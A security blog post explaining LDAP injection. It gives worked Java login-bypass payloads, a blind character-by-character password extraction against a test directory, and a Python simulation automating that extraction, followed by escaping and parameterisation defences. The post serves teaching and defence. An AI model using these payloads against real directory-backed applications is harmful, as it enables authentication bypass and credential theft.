Everybody knows about SQL injection. It is the celebrity of software security. But there are many other kinds of injection attacks that might feel jealous of SQL injection's popularity. That's not fair. Let's try to fill the gap and talk about LDAP injection.

What is LDAP?

LDAP stands for Lightweight Directory Access Protocol. It is a client-server protocol with a binary (ASN.1 BER) encoding that lets clients search and modify directory services. LDAP normally runs over TCP/IP in clear text, so in practice it should be protected with TLS (LDAPS, or StartTLS on the standard port). LDAPv3 was defined in RFC 2251, which has since been superseded by RFC 4511.

  • Java has an LDAP client API as part of JNDI (the javax.naming.directory and javax.naming.ldap packages)

What is an LDAP injection?

LDAP injection is an injection attack in which an attacker inserts LDAP filter syntax into a query that an application builds from untrusted data. As a result, the attacker can change what the application asks the LDAP server, which may lead to bypassing authentication, reading or even updating sensitive information. LDAP injections usually occur because an application concatenates untrusted data, which may come from an adversary, into an LDAP search filter without escaping it.

An example of LDAP injection

Let's assume that we have an internal LDAP server behind the firewall. An application uses it for user authentication: it asks the user for credentials, then checks whether they are valid by searching the directory for an entry whose uid and userPassword attributes both equal the supplied values. Here is what the application does with normal input, and what happens when the username and password contain LDAP filter syntax:

$ javac -d classes LDAPLogin.java 
$ java -classpath classes LDAPLogin bob secret
LDAP query: (&(uid=bob)(userPassword=secret))
Access granted
$ java -classpath classes LDAPLogin bob wrong
LDAP query: (&(uid=bob)(userPassword=wrong))
Access denied
$ java -classpath classes LDAPLogin "bob)(|(uid=bob" "wrong)"
LDAP query: (&(uid=bob)(|(uid=bob)(userPassword=wrong)))
Access granted
The impact of such an injection depends on:
  • the version and configuration of the LDAP server
  • the application logic
and on the shape of the filter the application builds. Two common shapes:
  • AND operator goes first. It looks like (&(field1=value1)(field2=value2)). This kind of search request is used by the application above. The injected username bob)(|(uid=bob closes the uid clause and opens an OR clause, and the injected password wrong) closes that clause again, so the server receives (&(uid=bob)(|(uid=bob)(userPassword=wrong))). The OR is already satisfied by uid=bob, so the password is never really checked and access is granted.
  • OR operator goes first. It looks like (|(field1=value1)(field2=value2)).

Blind LDAP injections

Blind LDAP injections are similar to blind SQL injections. An application may be vulnerable to LDAP injection but not print the fields the attacker cares about, so the attacker cannot simply dump the content of the directory. If the application reveals in some way whether the search with the injected data matched anything, that is enough to ask yes/no questions. The attacker can then test a guessed prefix of an attribute value with a substring filter such as (userPassword=s*), extend the prefix one character at a time, and so extract data from the directory with a number of requests that grows linearly, not exponentially, in the length of the value. Note that this particular extraction works only because the test server stores userPassword in clear text and is willing to evaluate substring filters against it; a directory that stores password hashes or refuses such filters (see the ldapsearch output at the end of this post) is not exposed in this way, although other attributes may still be.

$ javac -d classes LDAPInfo.java 
$ java -cp classes LDAPInfo bob
LDAP query: (&(uid=bob)(objectClass=person))
Phone: telephoneNumber: 555-9999
$ java -cp classes LDAPInfo boba
LDAP query: (&(uid=boba)(objectClass=person))
Nobody found!
$ java -cp classes LDAPInfo "bob)(userPassword=a*"
LDAP query: (&(uid=bob)(userPassword=a*)(objectClass=person))
Nobody found!
$ java -cp classes LDAPInfo "bob)(userPassword=b*"
LDAP query: (&(uid=bob)(userPassword=b*)(objectClass=person))
Nobody found!
$ java -cp classes LDAPInfo "bob)(userPassword=c*"
LDAP query: (&(uid=bob)(userPassword=c*)(objectClass=person))
Nobody found!
[...]
$ java -cp classes LDAPInfo "bob)(userPassword=s*"
LDAP query: (&(uid=bob)(userPassword=s*)(objectClass=person))
Phone: telephoneNumber: 555-9999
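The whole chain above, as an added example that is not the post's Java code: a tiny in-memory stand-in for the LDAP server (a parser and evaluator for the filter subset the post uses), the two vulnerable filter constructions from LDAPLogin and LDAPInfo, and the blind extraction loop that turns the found/not-found answer into the password one character at a time. It is written in Python so that it runs without a directory server; the directory entries, the password 'secret', and all function names are constructed for the example.

```python
"""In-memory model of the post's LDAPLogin and LDAPInfo programs (added example,
not the original Java). Directory entries, the password 'secret' and all helper
names are constructed; the filter grammar is the RFC 4515 subset needed here."""

DIRECTORY = [  # constructed test data standing in for the directory server behind the firewall
    {"uid": ["bob"], "userPassword": ["secret"], "objectClass": ["person"], "telephoneNumber": ["555-9999"]},
    {"uid": ["alice"], "userPassword": ["hunter2"], "objectClass": ["person"], "telephoneNumber": ["555-0001"]},
]
QUERY_LOG = []  # every filter the 'server' received, i.e. what a blind attack costs in requests

def parse_filter(text):
    """Parse (&..), (|..), (attr=value) into ('&'|'|', children) or ('=', attr, pieces)."""
    pos = [0]

    def expect(ch):
        if text[pos[0]] != ch:
            raise ValueError("expected %r at offset %d" % (ch, pos[0]))
        pos[0] += 1

    def parse():
        expect("(")
        if text[pos[0]] in "&|":
            op, children = text[pos[0]], []
            pos[0] += 1
            while text[pos[0]] == "(":
                children.append(parse())
            node = (op, children)
        else:
            eq = text.index("=", pos[0])
            attr, pos[0] = text[pos[0]:eq].lower(), eq + 1
            pieces, cur = [], ""  # assertion value split on unescaped '*'
            while text[pos[0]] != ")":
                ch = text[pos[0]]
                if ch == "\\":  # \xx escape: always a literal character, never a wildcard
                    cur, pos[0] = cur + chr(int(text[pos[0] + 1:pos[0] + 3], 16)), pos[0] + 3
                elif ch == "*":  # an unescaped '*' starts a new substring piece
                    pieces, cur, pos[0] = pieces + [cur], "", pos[0] + 1
                else:
                    cur, pos[0] = cur + ch, pos[0] + 1
            node = ("=", attr, pieces + [cur])
        expect(")")
        return node

    node = parse()
    if pos[0] != len(text):
        raise ValueError("trailing data after the filter")
    return node

def match_value(pieces, value):
    """Equality when there is no '*'; otherwise an initial/any/final substring match."""
    if len(pieces) == 1:
        return pieces[0] == value
    head, tail = pieces[0], pieces[-1]
    if len(value) < len(head) + len(tail) or not (value.startswith(head) and value.endswith(tail)):
        return False
    rest = value[len(head):len(value) - len(tail)]
    for piece in pieces[1:-1]:  # 'any' pieces must appear in order between head and tail
        idx = rest.find(piece)
        if idx < 0:
            return False
        rest = rest[idx + len(piece):]
    return True

def evaluate(node, entry):
    if node[0] in "&|":
        return (all if node[0] == "&" else any)(evaluate(c, entry) for c in node[1])
    attrs = {k.lower(): v for k, v in entry.items()}  # attribute names are case-insensitive
    return any(match_value(node[2], v) for v in attrs.get(node[1], []))

def search(filter_text):
    QUERY_LOG.append(filter_text)
    node = parse_filter(filter_text)
    return [e for e in DIRECTORY if evaluate(node, e)]

def ldap_login(uid, password):
    """Vulnerable like LDAPLogin: untrusted input concatenated straight into the filter."""
    return len(search("(&(uid=%s)(userPassword=%s))" % (uid, password))) > 0

def ldap_info(uid):
    """Vulnerable like LDAPInfo: returns the phone number, or None for 'Nobody found!'."""
    hits = search("(&(uid=%s)(objectClass=person))" % uid)
    return hits[0]["telephoneNumber"][0] if hits else None

def extract_password(uid, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=64):
    """Blind extraction: grow a prefix one character at a time through the found/not-found oracle."""
    known = ""
    while len(known) < max_len:
        nxt = next((c for c in alphabet if ldap_info("%s)(userPassword=%s*" % (uid, known + c)) is not None), None)
        if nxt is None:
            return known  # nothing extends the prefix: end of the password, or a character outside the alphabet
        known += nxt
        if ldap_info("%s)(userPassword=%s" % (uid, known)) is not None:  # exact match: the whole password
            return known
    return known

if __name__ == "__main__":
    print(ldap_login("bob", "wrong"), ldap_login("bob)(|(uid=bob", "wrong)"))  # False True
    print(extract_password("bob"), len(QUERY_LOG))  # secret 78
```

Running it prints the login bypass, then the recovered password and the total number of requests the fake server saw (76 of them for the six-letter password, about 13 per character with this alphabet, plus the two logins). The exact-match probe after each extension is what tells the attacker the password is complete rather than merely a prefix; without it, 'secret' and 'secret' followed by a character outside the alphabet would look the same.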

How to prevent LDAP injections

Nothing surprising here. Input validation and escaping prevent LDAP injections. Applications should escape all data that comes from untrusted sources before it is used in an LDAP filter: RFC 4515 requires that the characters ( ) * \ and NUL be written as \28 \29 \2a \5c and \00 (other characters, for example non-ASCII bytes, may be escaped the same way). A value that goes into a distinguished name rather than a filter needs the different escaping of RFC 4514. Where possible, validate untrusted input against an allowlist as well (a username rarely needs to contain parentheses), and let the library do the escaping: JNDI's DirContext.search(name, filterExpr, filterArgs, controls) accepts placeholders such as {0} in the filter expression and substitutes filterArgs with the special characters escaped, so the data cannot change the structure of the filter. OWASP's LDAP Injection Prevention Cheat Sheet covers all of this, and its advice applies not only to web applications.

Whether the password-guessing trick above is possible also depends on the server. Some directory servers refuse to evaluate a search filter on an attribute such as userPassword that is not indexed, as in this ldapsearch output, which ends the attack before it begins:

$ ldapsearch -h ldap.server m -x -b "dc=test,dc=com" "(&(uid=test)(userPassword=a*))"
....
# search result
search: 2
result: 53 Server is unwilling to perform
text: Function Not Implemented, search filter attribute userpassword is not indexed/cataloged

# numResponses: 1

I write about Java, security, electronics and DIY
